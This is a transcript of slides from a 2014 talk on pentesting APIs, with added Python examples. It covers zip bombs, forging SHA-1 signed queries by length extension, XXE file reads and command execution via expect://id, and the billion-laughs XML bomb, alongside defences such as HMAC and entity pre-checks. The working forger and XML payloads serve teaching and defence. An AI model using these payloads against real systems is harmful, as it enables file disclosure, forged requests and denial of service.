CodeFest 2014 - Pentesting client/server API


Published on April 5, 2014

Author: sergeybelove

Source: slideshare.net

Description

http://2014.codefest.ru/lecture/696

Pentesting client/server API Sergey Belov

$ whoami (© 2002—2014, Digital Security)
• Senior Security Auditor at Digital Security
• BugHunter: Google, Yandex, Badoo, Yahoo +++
• Writer: habrahabr, Xakep magazine
• CTF: DEFCON 2012 CTF Final, Chaos Construction CTF’2013
• Speaker: CodeFest 2012, ZeroNights 0x03
• Trainer: Hack in Paris’2014, BlackHat’2014 USA (soon)

What are we talking about? API

Hacking via API

From interface to API methods

What should we test?
• Logic!
• Bypassing restrictions (sqli/xss)
• Parameter tampering

Developing:
• Stop writing hacks and custom implementations in the API! Really

ZIP

A 42 KB upload… that unpacks to 10 GB? …100 GB? …100 TB? …4.5 PB! (42.zip, http://www.unforgettable.dk/)

Say HELLO to ZIP BOMB!
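The defence the slide implies for an API that accepts archives, as an added example that is not part of the talk: check the sizes the central directory declares before inflating anything, then enforce the same budget on the bytes that actually come out of the decompressor. The budgets (50 MiB, 100x) and the sample archives are assumptions constructed for the example; 42.zip itself is zips nested inside zips, so an outer check only sees the first layer and the caller has to recurse into any member that is itself an archive with the same budget.

```python
import io
import zipfile

# Budgets are assumptions for this example; tune them to the real upload handler.
MAX_TOTAL_UNCOMPRESSED = 50 * 1024 * 1024   # 50 MiB for the whole archive
MAX_RATIO = 100                             # reject anything that inflates more than 100x
CHUNK = 64 * 1024


class ZipBombSuspected(Exception):
    pass


def build_archive(members):
    """Build an in-memory zip from {name: bytes}. Only used to construct sample input."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_DEFLATED) as zf:
        for name, payload in members.items():
            zf.writestr(name, payload)
    return buf.getvalue()


def precheck(data, max_total=MAX_TOTAL_UNCOMPRESSED, max_ratio=MAX_RATIO):
    """First line of defence: the central directory declares the uncompressed size of
    every member, so the archive can be rejected before a single byte is inflated.
    Caveat: those numbers are attacker-controlled, and a nested bomb only declares
    its outermost layer here, so nested archives are reported for the caller to
    recurse into with the same budget."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
    total = sum(i.file_size for i in infos)
    compressed = sum(i.compress_size for i in infos) or 1
    ratio = total / compressed
    nested = [i.filename for i in infos if i.filename.lower().endswith(".zip")]
    if total > max_total:
        raise ZipBombSuspected(f"declared size {total} exceeds budget {max_total}")
    if ratio > max_ratio:
        raise ZipBombSuspected(f"compression ratio {ratio:.0f}x exceeds {max_ratio}x")
    return {"declared_total": total, "ratio": ratio, "nested_archives": nested}


def safe_extract(data, max_total=MAX_TOTAL_UNCOMPRESSED):
    """Second line: stream each member and count what actually comes out of the
    decompressor, aborting as soon as the running total across all members passes
    the budget, so the limit is enforced on real output rather than declared sizes."""
    out = {}
    produced = 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            chunks = []
            with zf.open(info) as fh:
                while True:
                    chunk = fh.read(CHUNK)
                    if not chunk:
                        break
                    produced += len(chunk)
                    if produced > max_total:
                        raise ZipBombSuspected(
                            f"{info.filename}: output passed {max_total} bytes while inflating")
                    chunks.append(chunk)
            out[info.filename] = b"".join(chunks)
    return out


if __name__ == "__main__":
    # Constructed sample: 16 MiB of zeros deflates to roughly 16 KB, a ~1000x ratio.
    bomb = build_archive({"layer.bin": b"\0" * (16 * 1024 * 1024)})
    print(len(bomb), "bytes on the wire")
    try:
        precheck(bomb)
    except ZipBombSuspected as e:
        print("rejected:", e)
```

Run both checks: the declared-size check is cheap and stops the obvious case, the streaming budget is what holds when the headers lie or when you recurse into an inner layer that has fresh headers of its own.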

Hacking via API © 2002—2014, Digital Security 21 The evil of JavaScript and


Hacking via API © 2002—2014, Digital Security 24 http://habrahabr.ru/post/186160/

Crypto

Query signing: Sign = sha*(…+DATA+…), with the APIkey mixed into the hashed input

But why?

Say hello again. To the length extension attack

A=1&B=2&C=3 07ce36c769ae130708258fb5dfa3d37ca5a67514 TOKEN=sha1(KEY+DATA)

Suppose the attacker has hijacked just 1 request…

What does the attacker know?
• Original data
• Sign (token)

What does the attacker want? Change some data / change params

A=1&B=2&C=3\x80\x00\x00…\x02&C=4 (the original data, then the SHA-1 padding of KEY+DATA as glue, then the appended parameter)

Can sign a new query without the API key!
Vkontakte: sig = md5(name1=value1name2=value2api_secret)
Mail.RU: sig = md5(uid + params + private_key)
http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack
Note: length extension needs the secret in front, H(KEY + DATA). The two formulas above put the secret at the end, so they cannot be extended this way, but a bare hash over data plus secret is still a home-grown construction; use HMAC.
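The attack on the slides carried through end to end, as an added example that is not the talk's own code: a minimal SHA-1 whose chaining state can be seeded from a captured token, the glue padding, and a forged `A=1&B=2&C=3…&C=4` with a token the server accepts. The key `s3cret-api-key` and the `last_param` parser are assumptions for the example; the attacker never sees the key and only guesses its length (in practice you loop `key_len` over 1..64 and submit each candidate until one is accepted). `hmac_sign` is the fix.

```python
import hashlib
import hmac
import struct

SHA1_IV = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0)
MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md_padding(message_len):
    """Merkle-Damgard padding SHA-1 appends to a message of message_len bytes:
    0x80, zero bytes up to 56 mod 64, then the bit length as a big-endian uint64."""
    return b"\x80" + b"\x00" * ((55 - message_len) % 64) + struct.pack(">Q", message_len * 8)


def sha1_resume(state, data, total_len):
    """SHA-1 over `data`, but starting from chaining state `state` instead of the IV.
    total_len is the byte length of everything hashed so far plus `data`; it only
    feeds the final padding. With state=SHA1_IV and total_len=len(data) this is
    plain SHA-1 and agrees with hashlib."""
    h = list(state)
    msg = data + md_padding(total_len)
    for off in range(0, len(msg), 64):
        w = list(struct.unpack(">16I", msg[off:off + 64]))
        for i in range(16, 80):
            w.append(_rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
        a, b, c, d, e = h
        for i in range(80):
            if i < 20:
                f, k = (b & c) | (~b & d), 0x5A827999
            elif i < 40:
                f, k = b ^ c ^ d, 0x6ED9EBA1
            elif i < 60:
                f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
            else:
                f, k = b ^ c ^ d, 0xCA62C1D6
            a, b, c, d, e = (_rotl(a, 5) + f + e + k + w[i]) & MASK, a, _rotl(b, 30), c, d
        h = [(x + y) & MASK for x, y in zip(h, (a, b, c, d, e))]
    return "".join(f"{x:08x}" for x in h)


def sign(key, data):
    """The scheme on the slide: TOKEN = sha1(KEY + DATA). Vulnerable to extension."""
    return hashlib.sha1(key + data).hexdigest()


def hmac_sign(key, data):
    """The fix: HMAC keys the hash properly, so a token is not a resumable state."""
    return hmac.new(key, data, hashlib.sha1).hexdigest()


def forge(orig_data, orig_token, key_len, suffix):
    """Attacker side. Knows only DATA and sha1(KEY + DATA), guesses len(KEY), and
    produces DATA' = DATA + glue + suffix together with a valid sha1(KEY + DATA')."""
    state = struct.unpack(">5I", bytes.fromhex(orig_token))   # token is the chaining state
    glue = md_padding(key_len + len(orig_data))                # what SHA-1 appended server-side
    forged_data = orig_data + glue + suffix
    forged_token = sha1_resume(state, suffix, key_len + len(forged_data))
    return forged_data, forged_token


def last_param(query, name):
    """Most query-string parsers keep the last duplicate, which is why `&C=4`
    overrides C=3 even though the glue bytes sit inside C's original value."""
    value = None
    for part in query.split(b"&"):
        k, _, v = part.partition(b"=")
        if k == name:
            value = v
    return value


def demo(key=b"s3cret-api-key"):   # hypothetical key; the attacker never sees it
    data = b"A=1&B=2&C=3"
    token = sign(key, data)                                   # captured from one request
    forged_data, forged_token = forge(data, token, len(key), b"&C=4")
    return {
        "server_accepts_forgery": hmac.compare_digest(sign(key, forged_data), forged_token),
        "C_seen_by_server": last_param(forged_data, b"C"),
        "hmac_accepts_forgery": hmac.compare_digest(hmac_sign(key, forged_data), forged_token),
    }


if __name__ == "__main__":
    print(demo())
```

The same construction works for MD5, SHA-256 and SHA-512 because all of them are Merkle-Damgard hashes that output their full internal state; only the padding and block size change. HMAC, or a hash from the SHA-3 family, closes the hole.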

Hacking via API © 2002—2014, Digital Security 36 Request hijacking… How?


XML? XML entities!

DTD example:
<!ENTITY writer "Donald Duck.">
<!ENTITY copyright "Copyright W3Schools.">
XML example:
<author>&writer;&copyright;</author>

XML entities? External Entity!

<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>

<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "expect://id" >]>
<foo>&xxe;</foo>
(expect:// is a PHP stream wrapper that runs the command, so where it is enabled this XXE is code execution)

XML Bombs!

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
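The "disable entities" advice from the closing slides, worked through for both slides above (the external entity and the entity bomb), as an added example that is not the talk's own code. It uses expat's DTD declaration callbacks to read the entity declarations without expanding or fetching anything, stops the pre-parse at the end of the DOCTYPE so the bomb is never inflated, computes what each internal entity would expand to (lol9 comes out at 3 billion characters), and only then hands the document to ElementTree. The 1,000,000 character cap and the three sample documents are constructed for the example; the benign one is the slide's Donald Duck DTD.

```python
import re
import xml.parsers.expat
import xml.etree.ElementTree as ET

MAX_EXPANSION = 1_000_000            # assumption: cap on what one entity may expand to
ENTITY_REF = re.compile(r"&([^;&#\s]+);")   # general entity refs; char refs (&#..;) excluded


class UnsafeXML(Exception):
    pass


class _DtdDone(Exception):
    """Raised from a callback to stop expat right after the DTD, before any content."""


def inspect_dtd(xml_bytes):
    """Collect entity declarations through expat's DTD callbacks. Nothing is expanded
    and nothing is fetched: external references are refused and parsing stops at the
    end of the DOCTYPE, so the billion-laughs document is never inflated."""
    report = {"doctype": None, "external": [], "internal": {}}
    p = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        report["doctype"] = name

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        if sysid is not None or pubid is not None:
            report["external"].append((name, sysid))
        elif value is not None:
            report["internal"][name] = value     # literal text, references unexpanded

    def on_end_doctype():
        raise _DtdDone

    p.StartDoctypeDeclHandler = on_doctype
    p.EntityDeclHandler = on_entity
    p.EndDoctypeDeclHandler = on_end_doctype
    p.ExternalEntityRefHandler = lambda context, base, sysid, pubid: 0   # never fetch
    try:
        p.Parse(xml_bytes, True)
    except _DtdDone:
        pass
    return report


def expansion_size(internal, name, memo=None, stack=()):
    """Characters an entity produces once fully expanded, computed from the
    declarations alone (no expansion performed). Recursion is rejected."""
    memo = {} if memo is None else memo
    if name in memo:
        return memo[name]
    if name in stack:
        raise UnsafeXML(f"recursive entity {name}")
    value = internal.get(name, "")
    total, last = 0, 0
    for m in ENTITY_REF.finditer(value):
        total += (m.start() - last) + expansion_size(internal, m.group(1), memo, stack + (name,))
        last = m.end()
    total += len(value) - last
    memo[name] = total
    return total


def parse_safely(xml_bytes, max_expansion=MAX_EXPANSION):
    """Reject XXE and entity bombs before the real parser sees the document."""
    report = inspect_dtd(xml_bytes)
    if report["external"]:
        raise UnsafeXML(f"external entities declared: {report['external']}")
    memo = {}
    for name in report["internal"]:
        size = expansion_size(report["internal"], name, memo)
        if size > max_expansion:
            raise UnsafeXML(f"entity {name} expands to {size} characters")
    return ET.fromstring(xml_bytes)


# Constructed sample documents for the example.
BENIGN_DOC = (b'<!DOCTYPE author [ <!ENTITY writer "Donald Duck."> '
              b'<!ENTITY copyright "Copyright W3Schools."> ]>'
              b'<author>&writer;&copyright;</author>')
XXE_DOC = (b'<!DOCTYPE foo [ <!ELEMENT foo ANY > '
           b'<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>')


def billion_laughs(depth=9, fanout=10):
    """Generate the slide's lolz document: lol, then lol1..lol<depth>, each ten of the previous."""
    decls = ['<!ENTITY lol "lol">', "<!ELEMENT lolz (#PCDATA)>"]
    for i in range(1, depth + 1):
        prev = "lol" if i == 1 else f"lol{i - 1}"
        decls.append(f'<!ENTITY lol{i} "' + f"&{prev};" * fanout + '">')
    return ('<?xml version="1.0"?><!DOCTYPE lolz [ ' + " ".join(decls)
            + f" ]><lolz>&lol{depth};</lolz>").encode()
```

In production use a parser that exposes the switches directly (lxml with `resolve_entities=False`, or `defusedxml`); the point of the pre-parse above is that the check happens on the declarations, before any expansion, which is the only place a bomb is cheap to recognise.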

Man in the Middle

Examples?

2013-11-19 by Reginaldo Silva
https://www.facebook.com/BugBounty/posts/778897822124446
http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution

Testing:
• https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)
• XXE to RCE: https://gist.github.com/joernchen/3623896
Development:
• Disable entities

Finally:
• Re-test all interface restrictions;
• Specific compressions;
• JS callbacks;
• Crypto + SSL test + hardcoded credentials (hackapp.com);
• XML - XXE;
• Anything else :]

Thanks for your attention! Questions?
twitter.com/sergeybelove
sbelov@dsec.ru
Digital Security in Moscow: (495) 223-07-86
Digital Security in Saint Petersburg: (812) 703-15-47
